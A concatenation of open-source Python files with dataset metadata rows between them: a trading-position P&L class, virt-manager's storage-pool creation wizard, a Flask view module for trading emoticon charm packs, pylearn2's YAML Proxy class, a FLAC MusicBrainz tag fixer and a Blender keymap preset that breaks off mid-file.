self.fee_model = InteractiveBrokersStockUSFeeModel()
@property
def realized_pnl(self):
return self._realized_pnl
@property
def acquisition_cost(self):
return self._cost
@property
def quantity(self):
return self._quantity
@property
def average_price(self):
if self._quantity == 0:
return numpy.NaN
return self._cost / self._quantity
def calc_market_value(self, current_price):
return self.quantity * current_price
def calc_unrealized_pnl(self, current_price):
return self.calc_market_value(current_price) - self.acquisition_cost
def calc_total_pnl(self, current_price):
return self.realized_pnl + self.calc_unrealized_pnl(current_price)
def add_fill(self, fill_qty, fill_price):
"""
        Adds a fill to the position, updating quantity, average cost and
        realized P&L (net of fees from the fee model).
        :param fill_qty: signed fill quantity (positive buys, negative sells)
        :param fill_price: fill price per unit
"""
logging.debug('adding fill: %s at %s (amount: %.2f)', fill_qty, fill_price, fill_qty * fill_price)
old_qty = self._quantity
if old_qty == 0:
self._quantity = fill_qty
self._cost = fill_qty * fill_price
else:
old_cost = self._cost
old_realized = self._realized_pnl
            closing_qty = 0
            opening_qty = fill_qty
            if math.copysign(1, old_qty) != math.copysign(1, fill_qty):
                # The fill trades against the position: the overlapping
                # quantity closes at the average cost (realizing P&L) and
                # any remainder opens in the new direction.
                closing_qty = min(abs(old_qty), abs(fill_qty)) * math.copysign(1, fill_qty)
                opening_qty = fill_qty - closing_qty
self._quantity = old_qty + fill_qty
self._cost = old_cost + (opening_qty * fill_price) + (closing_qty * old_cost / old_qty)
self._realized_pnl = old_realized + closing_qty * (old_cost / old_qty - fill_price)
self._realized_pnl -= self.fee_model.compute_fees(fill_qty, fill_price)
| apache-2.0 | 5,239,085,414,607,550,000 | 28.954023 | 106 | 0.60284 | false | 3.57476 | false | false | false |
jiemohuishou/virt-manager-0.9.3 | src/virtManager/createpool.py | 1 | 23776 | #
# Copyright (C) 2008 Red Hat, Inc.
# Copyright (C) 2008 Cole Robinson <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import gtk
import copy
import logging
from virtManager import util
from virtManager.baseclass import vmmGObjectUI
from virtManager.asyncjob import vmmAsyncJob
from virtinst import Storage
PAGE_NAME = 0
PAGE_FORMAT = 1
_comboentry_xml = """
<interface>
<object class="GtkComboBoxEntry" id="pool-source-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_source_path_changed"/>
<signal name="focus" handler="on_pool_source_path_focus"/>
</object>
<object class="GtkComboBoxEntry" id="pool-target-path">
<property name="visible">True</property>
<signal name="changed" handler="on_pool_target_path_changed"/>
<signal name="focus_in_event" handler="on_pool_target_path_focus_in_event"/>
</object>
</interface>
"""
class vmmCreatePool(vmmGObjectUI):
def __init__(self, conn):
vmmGObjectUI.__init__(self,
"vmm-create-pool.ui",
"vmm-create-pool")
self.conn = conn
self._pool = None
self._pool_class = Storage.StoragePool
self.window.add_from_string(_comboentry_xml)
self.widget("pool-source-box").pack_start(
self.widget("pool-source-path"))
self.widget("pool-target-box").pack_start(
self.widget("pool-target-path"))
self.window.connect_signals({
"on_pool_forward_clicked" : self.forward,
"on_pool_back_clicked" : self.back,
"on_pool_cancel_clicked" : self.close,
"on_vmm_create_pool_delete_event" : self.close,
"on_pool_finish_clicked" : self.forward,
"on_pool_pages_change_page" : self.page_changed,
"on_pool_source_button_clicked" : self.browse_source_path,
"on_pool_target_button_clicked" : self.browse_target_path,
"on_pool_name_activate": self.forward,
"on_pool_hostname_activate" : self.hostname_changed,
"on_pool_iqn_chk_toggled": self.iqn_toggled,
"on_pool_name_focus_in_event": (self.update_doc, "name",
"pool-info1"),
# I cannot for the life of me get a combobox to abide
# focus-in, button-pressed, motion-over, etc.
"on_pool_type_focus": (self.update_doc, "type", "pool-info1"),
"on_pool_type_changed": (self.update_doc_changed, "type",
"pool-info1"),
"on_pool_format_focus": (self.update_doc, "format", "pool-info2"),
"on_pool_format_changed": (self.update_doc_changed, "format",
"pool-info2"),
"on_pool_target_path_focus_in_event": (self.update_doc,
"target_path",
"pool-info2"),
"on_pool_target_path_focus": (self.update_doc, "target_path",
"pool-info2"),
"on_pool_target_path_changed": (self.update_doc_changed,
"target_path",
"pool-info2"),
"on_pool_source_path_focus_in_event": (self.update_doc,
"source_path",
"pool-info2"),
"on_pool_source_path_focus": (self.update_doc, "source_path",
"pool-info2"),
"on_pool_source_path_changed": (self.update_doc_changed,
"source_path",
"pool-info2"),
"on_pool_hostname_focus_in_event": (self.update_doc, "host",
"pool-info2"),
"on_pool_build_focus_in_event": (self.update_build_doc),
"on_pool_iqn_focus_in_event": (self.update_doc, "iqn",
"pool-info2"),
})
self.bind_escape_key_close()
# XXX: Help docs useless/out of date
self.widget("pool-help").hide()
finish_img = gtk.image_new_from_stock(gtk.STOCK_QUIT,
gtk.ICON_SIZE_BUTTON)
self.widget("pool-finish").set_image(finish_img)
self.set_initial_state()
def show(self, parent):
logging.debug("Showing new pool wizard")
self.reset_state()
self.topwin.set_transient_for(parent)
self.topwin.present()
def close(self, ignore1=None, ignore2=None):
logging.debug("Closing new pool wizard")
self.topwin.hide()
return 1
def _cleanup(self):
self.conn = None
self._pool = None
def set_initial_state(self):
self.widget("pool-pages").set_show_tabs(False)
type_list = self.widget("pool-type")
type_model = gtk.ListStore(str, str)
type_list.set_model(type_model)
text1 = gtk.CellRendererText()
type_list.pack_start(text1, True)
type_list.add_attribute(text1, 'text', 1)
format_list = self.widget("pool-format")
format_model = gtk.ListStore(str, str)
format_list.set_model(format_model)
text2 = gtk.CellRendererText()
format_list.pack_start(text2, False)
format_list.add_attribute(text2, 'text', 1)
# Target path combo box entry
target_list = self.widget("pool-target-path")
# target_path, Label, pool class instance
target_model = gtk.ListStore(str, str, object)
target_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
target_list.set_model(target_model)
target_list.set_text_column(0)
target_list.child.connect("focus-in-event", self.update_doc,
"target_path", "pool-info2")
# Source path combo box entry
source_list = self.widget("pool-source-path")
# source_path, Label, pool class instance
source_model = gtk.ListStore(str, str, object)
source_model.set_sort_column_id(0, gtk.SORT_ASCENDING)
source_list.set_model(source_model)
source_list.set_text_column(0)
source_list.child.connect("focus-in-event", self.update_doc,
"source_path", "pool-info2")
self.populate_pool_type()
self.widget("pool-info-box1").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
self.widget("pool-info-box2").modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse("grey"))
def reset_state(self):
self.widget("pool-pages").set_current_page(0)
self.widget("pool-forward").show()
self.widget("pool-finish").hide()
self.widget("pool-back").set_sensitive(False)
self.widget("pool-name").set_text("")
self.widget("pool-name").grab_focus()
self.widget("pool-type").set_active(0)
self.widget("pool-target-path").child.set_text("")
self.widget("pool-source-path").child.set_text("")
self.widget("pool-hostname").set_text("")
self.widget("pool-iqn-chk").set_active(False)
self.widget("pool-iqn-chk").toggled()
self.widget("pool-iqn").set_text("")
self.widget("pool-format").set_active(-1)
self.widget("pool-build").set_sensitive(True)
self.widget("pool-build").set_active(False)
def hostname_changed(self, ignore):
# If a hostname was entered, try to lookup valid pool sources.
self.populate_pool_sources()
def iqn_toggled(self, src):
self.widget("pool-iqn").set_sensitive(src.get_active())
def populate_pool_type(self):
model = self.widget("pool-type").get_model()
model.clear()
types = Storage.StoragePool.get_pool_types()
types.sort()
for typ in types:
model.append([typ, "%s: %s" %
(typ, Storage.StoragePool.get_pool_type_desc(typ))])
def populate_pool_format(self, formats):
model = self.widget("pool-format").get_model()
model.clear()
for f in formats:
model.append([f, f])
def populate_pool_sources(self):
source_list = self.widget("pool-source-path")
source_model = source_list.get_model()
source_model.clear()
target_list = self.widget("pool-target-path")
target_model = target_list.get_model()
target_model.clear()
use_list = source_list
use_model = source_model
entry_list = []
if self._pool.type == Storage.StoragePool.TYPE_SCSI:
entry_list = self.list_scsi_adapters()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
pool_list = self.list_pool_sources()
entry_list = map(lambda p: [p.target_path, p.target_path, p],
pool_list)
use_list = target_list
use_model = target_model
elif self._pool.type == Storage.StoragePool.TYPE_DISK:
entry_list = self.list_disk_devs()
use_list = source_list
use_model = source_model
elif self._pool.type == Storage.StoragePool.TYPE_NETFS:
host = self.get_config_host()
if host:
pool_list = self.list_pool_sources(host=host)
entry_list = map(lambda p: [p.source_path, p.source_path, p],
pool_list)
use_list = source_list
use_model = source_model
for e in entry_list:
use_model.append(e)
if entry_list:
use_list.set_active(0)
def list_scsi_adapters(self):
scsi_hosts = self.conn.get_nodedevs("scsi_host")
host_list = map(lambda dev: dev.host, scsi_hosts)
clean_list = []
for h in host_list:
tmppool = copy.copy(self._pool)
name = "host%s" % h
tmppool.source_path = name
entry = [name, name, tmppool]
if name not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_disk_devs(self):
devs = self.conn.get_nodedevs("storage")
devlist = []
for dev in devs:
if dev.drive_type != "disk" or not dev.block:
continue
devlist.append(dev.block)
devlist.sort()
clean_list = []
for dev in devlist:
tmppool = copy.copy(self._pool)
tmppool.source_path = dev
entry = [dev, dev, tmppool]
if dev not in map(lambda l: l[0], clean_list):
clean_list.append(entry)
return clean_list
def list_pool_sources(self, host=None):
name = self.get_config_name()
pool_type = self._pool.type
plist = []
try:
plist = Storage.StoragePool.pool_list_from_sources(self.conn.vmm,
name, pool_type,
host=host)
except Exception:
logging.exception("Pool enumeration failed")
return plist
def show_options_by_pool(self):
def show_row(base, do_show):
self.widget(base + "-label").set_property("visible", do_show)
self.widget(base + "-box").set_property("visible", do_show)
src = hasattr(self._pool, "source_path")
src_b = src and not self.conn.is_remote()
tgt = hasattr(self._pool, "target_path")
tgt_b = tgt and not self.conn.is_remote()
host = hasattr(self._pool, "host")
fmt = hasattr(self._pool, "formats")
iqn = hasattr(self._pool, "iqn")
builddef, buildsens = self.get_build_default()
        # Source path browsing is meaningless for net pools
if self._pool.type in [Storage.StoragePool.TYPE_NETFS,
Storage.StoragePool.TYPE_ISCSI,
Storage.StoragePool.TYPE_SCSI]:
src_b = False
show_row("pool-target", tgt)
show_row("pool-source", src)
show_row("pool-hostname", host)
show_row("pool-format", fmt)
show_row("pool-build", buildsens)
show_row("pool-iqn", iqn)
self.widget("pool-target-path").child.set_text(self._pool.target_path)
self.widget("pool-target-button").set_sensitive(tgt_b)
self.widget("pool-source-button").set_sensitive(src_b)
self.widget("pool-build").set_active(builddef)
self.widget("pool-format").set_active(-1)
if fmt:
self.populate_pool_format(getattr(self._pool, "formats"))
self.widget("pool-format").set_active(0)
self.populate_pool_sources()
def get_config_type(self):
typ = self.widget("pool-type")
        if typ.get_active_iter() is not None:
return typ.get_model().get_value(typ.get_active_iter(), 0)
return None
def get_config_name(self):
return self.widget("pool-name").get_text()
def get_config_target_path(self):
src = self.widget("pool-target-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text()
def get_config_source_path(self):
src = self.widget("pool-source-path")
if not src.get_property("sensitive"):
return None
# If we provide the user with a drop down
model = src.get_model()
selection = src.get_active()
if selection != -1:
return model[selection][1]
return src.child.get_text().strip()
def get_config_host(self):
host = self.widget("pool-hostname")
if host.get_property("sensitive"):
return host.get_text().strip()
return None
def get_config_format(self):
format_combo = self.widget("pool-format")
model = format_combo.get_model()
        if format_combo.get_active_iter() is not None:
return model.get_value(format_combo.get_active_iter(), 0)
return None
def get_config_iqn(self):
iqn = self.widget("pool-iqn")
if iqn.get_property("sensitive") and iqn.get_property("visible"):
return iqn.get_text().strip()
return None
def get_build_default(self):
""" Return (default value, whether build option can be changed)"""
if not self._pool:
return (False, False)
if self._pool.type in [Storage.StoragePool.TYPE_DIR,
Storage.StoragePool.TYPE_FS,
Storage.StoragePool.TYPE_NETFS]:
# Building for these simply entails creating a directory
return (True, False)
elif self._pool.type in [Storage.StoragePool.TYPE_LOGICAL,
Storage.StoragePool.TYPE_DISK]:
            # Building these formats the source device, which is dangerous;
            # any pool returning (False, True) should be treated as such.
return (False, True)
else:
return (False, False)
def browse_source_path(self, ignore1=None):
source = self._browse_file(_("Choose source path"),
startfolder="/dev", foldermode=False)
if source:
self.widget("pool-source-path").child.set_text(source)
def browse_target_path(self, ignore1=None):
target = self._browse_file(_("Choose target directory"),
startfolder="/var/lib/libvirt",
foldermode=True)
if target:
self.widget("pool-target-path").child.set_text(target)
def forward(self, ignore=None):
notebook = self.widget("pool-pages")
try:
            if self.validate(notebook.get_current_page()) != True:
return
if notebook.get_current_page() == PAGE_FORMAT:
self.finish()
else:
self.widget("pool-forward").grab_focus()
notebook.next_page()
except Exception, e:
self.err.show_err(_("Uncaught error validating input: %s") % str(e))
return
def back(self, ignore=None):
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-pages").prev_page()
def finish(self):
self.topwin.set_sensitive(False)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.WATCH))
build = self.widget("pool-build").get_active()
progWin = vmmAsyncJob(self._async_pool_create, [build],
_("Creating storage pool..."),
_("Creating the storage pool may take a "
"while..."),
self.topwin)
error, details = progWin.run()
self.topwin.set_sensitive(True)
self.topwin.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.TOP_LEFT_ARROW))
if error:
error = _("Error creating pool: %s") % error
self.err.show_err(error,
details=details)
else:
self.close()
def _async_pool_create(self, asyncjob, build):
newconn = None
        # Open a separate connection to install on since this is async
newconn = util.dup_lib_conn(self._pool.conn)
meter = asyncjob.get_meter()
self._pool.conn = newconn
        logging.debug("Starting background pool creation.")
poolobj = self._pool.install(create=True, meter=meter, build=build)
poolobj.setAutostart(True)
logging.debug("Pool creation succeeded")
def page_changed(self, notebook_ignore, page_ignore, page_number):
if page_number == PAGE_NAME:
self.widget("pool-back").set_sensitive(False)
self.widget("pool-finish").hide()
self.widget("pool-forward").show()
self.widget("pool-forward").grab_focus()
elif page_number == PAGE_FORMAT:
self.widget("pool-back").set_sensitive(True)
self.widget("pool-finish").show()
self.widget("pool-finish").grab_focus()
self.widget("pool-forward").hide()
self.show_options_by_pool()
def get_pool_to_validate(self):
"""
Return a pool instance to use for parameter assignment validation.
For most pools this will be the one we built after step 1, but for
pools we find via FindPoolSources, this will be different
"""
source_list = self.widget("pool-source-path")
target_list = self.widget("pool-target-path")
pool = copy.copy(self._pool)
if source_list.get_active() != -1:
pool = source_list.get_model()[source_list.get_active()][2]
elif target_list.get_active() != -1:
pool = target_list.get_model()[target_list.get_active()][2]
return pool
def validate(self, page):
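        # Page 1 (name) builds the pool object; page 2 (format) applies
        # the remaining parameters and test-generates the XML before
        # allowing the wizard to finish.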
if page == PAGE_NAME:
typ = self.get_config_type()
name = self.get_config_name()
conn = self.conn.vmm
try:
self._pool_class = Storage.StoragePool.get_pool_class(typ)
self._pool = self._pool_class(name=name, conn=conn)
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
return True
elif page == PAGE_FORMAT:
target = self.get_config_target_path()
host = self.get_config_host()
source = self.get_config_source_path()
fmt = self.get_config_format()
iqn = self.get_config_iqn()
tmppool = self.get_pool_to_validate()
try:
tmppool.target_path = target
if host:
tmppool.host = host
if source:
tmppool.source_path = source
if fmt:
tmppool.format = fmt
if iqn:
tmppool.iqn = iqn
tmppool.get_xml_config()
except ValueError, e:
return self.err.val_err(_("Pool Parameter Error"), e)
buildval = self.widget("pool-build").get_active()
buildsen = (self.widget("pool-build").get_property("sensitive") and
self.widget("pool-build-box").get_property("visible"))
if buildsen and buildval:
ret = self.err.yes_no(_("Building a pool of this type will "
"format the source device. Are you "
"sure you want to 'build' this pool?"))
if not ret:
return ret
self._pool = tmppool
return True
def update_doc(self, ignore1, ignore2, param, infobox):
doc = self._build_doc_str(param)
self.widget(infobox).set_markup(doc)
def update_build_doc(self, ignore1, ignore2):
doc = ""
docstr = ""
if self._pool.type == Storage.StoragePool.TYPE_DISK:
docstr = _("Format the source device.")
elif self._pool.type == Storage.StoragePool.TYPE_LOGICAL:
docstr = _("Create a logical volume group from the source device.")
if docstr:
doc = self._build_doc_str("build", docstr)
self.widget("pool-info2").set_markup(doc)
def update_doc_changed(self, ignore1, param, infobox):
# Wrapper for update_doc and 'changed' signal
self.update_doc(None, None, param, infobox)
def _build_doc_str(self, param, docstr=None):
doc = ""
doctmpl = "<i><u>%s</u>: %s</i>"
prettyname = param.replace("_", " ").capitalize()
if docstr:
doc = doctmpl % (prettyname, docstr)
elif hasattr(self._pool_class, param):
doc = doctmpl % (prettyname,
getattr(self._pool_class, param).__doc__)
return doc
def _browse_file(self, dialog_name, startfolder=None, foldermode=False):
mode = gtk.FILE_CHOOSER_ACTION_OPEN
if foldermode:
mode = gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER
return util.browse_local(self.topwin, dialog_name, self.conn,
dialog_type=mode,
start_folder=startfolder)
vmmGObjectUI.type_register(vmmCreatePool)
| gpl-2.0 | -9,079,758,717,288,793,000 | 36.920255 | 84 | 0.549714 | false | 3.929268 | true | false | false |
Arcana/emoticharms.trade | app/emoticharms/views.py | 1 | 4346 | from app import db
from ..emoticharms.models import UserPack, Pack
from flask import Blueprint, render_template, abort
from forms import UserPacksForm, PackQuantityField
from ..util import valid_ti5_ticket
from flask.ext.login import login_required, current_user
from ..users.models import User
emoticharms = Blueprint("emoticharms", __name__, url_prefix="/emoticharms")
@emoticharms.route('/collection/', methods=['GET', 'POST'])
@login_required
@valid_ti5_ticket
def collection():
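    # Upsert the per-user pack quantities submitted from the form, then
    # re-render the form pre-filled with whatever is stored for this user.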
form = UserPacksForm()
if form.validate_on_submit():
print 'submitted'
for field in form:
if not isinstance(field, PackQuantityField):
continue
user_pack = UserPack.query.filter_by(pack_id=field.pack.id, user_id=current_user.account_id).first()
if user_pack is None:
user_pack = UserPack(field.pack.id, current_user.account_id, field.data)
db.session.add(user_pack)
else:
user_pack.quantity = field.data
db.session.commit()
form_data = {
user_pack.pack.normalized_name: user_pack.quantity
for user_pack in UserPack.query.filter_by(user=current_user).all()
}
print form_data
form = UserPacksForm(data=form_data)
return render_template('emoticharms/collection.html', form=form)
@emoticharms.route('/matches/')
@login_required
@valid_ti5_ticket
def matches():
"""
Match with other users by the count of packs the other party has that we want,
and that the other party wants and we have. Ordered by the most amount of combined packs matched.
"""
    # Packs we own none of (wanted) and packs we own more than one of (spares)
wanted_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0).all()
spare_packs = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity > 1).all()
wanted_pack_ids = [unicode(user_pack.pack_id) for user_pack in wanted_packs]
spare_pack_ids = [unicode(user_pack.pack_id) for user_pack in spare_packs]
    # Match other users who have spares of what we want, or want our dupes.
    # Guard first: an empty id list would render an invalid "IN ()" clause.
    if not wanted_pack_ids or not spare_pack_ids:
        return render_template('emoticharms/matches.html',
                               wanted_packs=wanted_packs,
                               spare_packs=spare_packs, matches=[])
    matches_query = db.engine.execute("""
SELECT
account_id,
SUM(spare_count) as other_user_has_spare_count,
SUM(want_count) as other_user_wants_count,
(spare_count + want_count) as total_count
FROM (
SELECT u.account_id, COUNT(*) as spare_count, 0 as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({wanted_pack_ids}) AND up.quantity > 1
GROUP BY u.account_id
UNION
SELECT u.account_id, 0 as spare_count, COUNT(*) as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({spare_pack_ids}) AND up.quantity = 0
GROUP BY u.account_id
) counts_table
GROUP BY counts_table.account_id
ORDER BY total_count desc
""".format(
wanted_pack_ids=','.join(wanted_pack_ids),
spare_pack_ids=','.join(spare_pack_ids)
)
)
# Attach user objects (probably a lot better way to do this)
matches = []
for match in matches_query:
matches.append({
'user': User.query.filter(User.account_id == match[0]).first(),
'other_user_has_spare_count': match[1],
'other_user_wants_count': match[2]
})
return render_template('emoticharms/matches.html',
wanted_packs=wanted_packs,
spare_packs=spare_packs,
matches=matches)
@emoticharms.route('/trade/<int:trade_user_id>/')
@login_required
@valid_ti5_ticket
def trade(trade_user_id):
if trade_user_id == current_user.account_id:
abort(404)
trade_user = User.query.get_or_404(trade_user_id)
    # Work-in-progress block made runnable: intersecting whole UserPack rows
    # can never match (user_id differs), so intersect on pack_id instead.
    # This is a sketch based on the models imported above.
    wanted = db.session.query(UserPack.pack_id).filter(
        UserPack.user_id == current_user.account_id, UserPack.quantity == 0)
    their_spares = db.session.query(UserPack.pack_id).filter(
        UserPack.user_id == trade_user.account_id, UserPack.quantity > 1)
    our_spares = db.session.query(UserPack.pack_id).filter(
        UserPack.user_id == current_user.account_id, UserPack.quantity > 1)
    their_wants = db.session.query(UserPack.pack_id).filter(
        UserPack.user_id == trade_user.account_id, UserPack.quantity == 0)
    receiving = [Pack.query.get(r[0]) for r in wanted.intersect(their_spares)]
    giving = [Pack.query.get(r[0]) for r in our_spares.intersect(their_wants)]
    trade = {
        "target_user": trade_user,
        "giving": giving,
        "receiving": receiving,
    }
return render_template('emoticharms/trade.html', trade=trade) | gpl-2.0 | 9,041,931,948,394,719,000 | 32.183206 | 115 | 0.631845 | false | 3.422047 | false | false | false |
TNick/pyl2extra | pyl2extra/config/proxy.py | 1 | 2004 | """Module containing the Proxy class and support functionality."""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2015, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from collections import namedtuple
# Lightweight container for initial YAML evaluation.
#
# This is intended as a robust, forward-compatible intermediate representation
# for either internal consumption or external consumption by another tool e.g.
# hyperopt.
#
# We've included a slot for positionals just in case, though they are
# unsupported by the instantiation mechanism as yet.
BaseProxy = namedtuple('BaseProxy', ['callable', 'positionals',
'keywords', 'yaml_src'])
class Proxy(BaseProxy):
"""
An intermediate representation between initial YAML parse and object
instantiation.
Parameters
----------
callable : callable
The function/class to call to instantiate this node.
positionals : iterable
Placeholder for future support for positional arguments (`*args`).
keywords : dict-like
A mapping from keywords to arguments (`**kwargs`), which may be
`Proxy`s or `Proxy`s nested inside `dict` or `list` instances.
Keys must be strings that are valid Python variable names.
yaml_src : str
The YAML source that created this node, if available.
Notes
-----
This is intended as a robust, forward-compatible intermediate
representation for either internal consumption or external consumption
by another tool e.g. hyperopt.
This particular class mainly exists to override `BaseProxy`'s `__hash__`
(to avoid hashing unhashable namedtuple elements).
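    Examples
    --------
    Illustrative only: a YAML node such as
    ``!obj:collections.OrderedDict {a: 1}`` would first be represented as
    ``Proxy(callable=OrderedDict, positionals=(), keywords={'a': 1},
    yaml_src='!obj:collections.OrderedDict {a: 1}')`` and only later
    instantiated by calling ``callable(**keywords)``.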
"""
__slots__ = []
def __hash__(self):
"""
Return a hash based on the object ID (to avoid hashing unhashable
namedtuple elements).
"""
return hash(id(self))
| bsd-3-clause | -2,535,705,651,637,892,600 | 33.551724 | 78 | 0.676647 | false | 4.523702 | false | false | false |
ebertland/audio-tools | fix-mb-tags.py | 1 | 1157 | #!/usr/bin/env python
# Copyright 2009 by Jeff Ebert
# License: GNU GPL v2
import sys
import mutagen.flac
import os.path as path
# Tip from:
# http://stackoverflow.com/questions/492483/setting-the-correct-encoding-when-piping-stdout-in-python
import codecs
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
def fix_mb_tags(flac_file):
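    # Some taggers store full MusicBrainz URLs (shape inferred from the
    # basename/splitext logic below, e.g. ".../artist/<uuid>.html");
    # keep only the bare UUID.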
for tag in flac_file:
if tag.startswith('musicbrainz_'):
# The value of each tag is a list, so I must iterate even though
# there is only 1 for these cases.
values = flac_file[tag]
for i in range(len(values)):
# Extract UUID value from URL.
base = path.basename(values[i])
base = path.splitext(base)[0]
values[i] = base
flac_file[tag] = values
def main(argv):
if len(argv) == 1:
print "Usage: {0} <flac file>+\n".format(path.basename(argv[0]))
sys.exit(0)
for fn in argv[1:]:
flac_file = mutagen.flac.Open(fn)
fix_mb_tags(flac_file)
print flac_file.pprint()
flac_file.save()
if __name__ == '__main__':
main(sys.argv)
| mit | 5,164,661,301,358,378,000 | 26.547619 | 101 | 0.59032 | false | 3.305714 | false | false | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/presets/keyconfig/pie_keymap.py | 1 | 33628 | import bpy
import os
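# Set a property on a keymap item, downgrading unknown-property errors
# to warnings so the preset still loads across Blender versions.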
def kmi_props_setattr(kmi_props, attr, value):
try:
setattr(kmi_props, attr, value)
except AttributeError:
print("Warning: property '%s' not found in keymap item '%s'" %
(attr, kmi_props.__class__.__name__))
except Exception as e:
print("Warning: %r" % e)
wm = bpy.context.window_manager
kc = wm.keyconfigs.new(os.path.splitext(os.path.basename(__file__))[0])
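# Each "# Map ..." block below rebuilds one keymap from scratch inside
# this new key configuration, which is named after this preset file.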
# Map Object Mode
km = kc.keymaps.new('Object Mode', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.use_proportional_edit_objects')
kmi = km.keymap_items.new('view3d.game_start', 'P', 'PRESS')
kmi = km.keymap_items.new('object.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('object.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('object.select_linked', 'L', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_grouped', 'G', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_mirror', 'M', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.parent_no_inverse_set', 'P', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.parent_clear', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.track_set', 'T', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.track_clear', 'T', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.constraint_add_with_targets', 'C', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.constraints_clear', 'C', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.location_clear', 'G', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.rotation_clear', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.scale_clear', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.origin_clear', 'O', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_clear', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('object.hide_render_clear', 'H', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.hide_render_set', 'H', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.move_to_layer', 'M', 'PRESS')
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_add')
kmi = km.keymap_items.new('object.duplicates_make_real', 'A', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_apply')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_single_user')
kmi = km.keymap_items.new('wm.call_menu', 'L', 'PRESS', ctrl=True)
